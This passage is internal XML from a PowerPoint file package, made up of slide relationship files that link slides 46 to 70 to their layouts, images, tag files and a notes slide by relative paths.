<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout291.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag175.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag174.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag173.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag172.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide47.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout301.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag179.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag178.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag177.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag176.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide48.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout311.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag183.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag182.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag181.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag180.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide49.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout321.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag187.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag186.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag185.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag184.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide50.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout331.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag191.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag190.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag189.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag188.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide51.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout341.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag195.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag194.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag193.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag192.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide52.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout351.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag199.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag198.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag197.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag196.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide53.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout361.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag203.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag202.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag201.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag200.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide54.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout371.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag207.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag206.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag205.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag204.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide55.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout381.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag211.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag210.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag209.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag208.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide56.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout391.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag215.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag214.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag213.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag212.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide57.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout401.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag219.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag218.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag217.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag216.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide58.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout411.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag223.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag222.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag221.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag220.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide59.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout421.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag227.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag226.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag225.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag224.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide60.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout431.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag232.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag231.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag230.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag229.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag228.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide61.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout441.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag236.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag235.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag234.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag233.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout451.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag240.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag239.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag238.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag237.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide63.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout461.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag241.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide64.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag245.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag244.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout471.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag243.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag242.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide65.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout481.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide66.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout491.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide67.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout501.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag249.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag248.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag247.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag246.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide68.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag258.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag257.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag256.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag255.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag254.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag253.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag252.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag251.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout511.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag262.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag261.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag260.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag259.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag250.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide69.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout522.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag265.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag264.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag263.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide70.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout532.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag268.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag267.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag266.xml"/></Relationships>
</file>

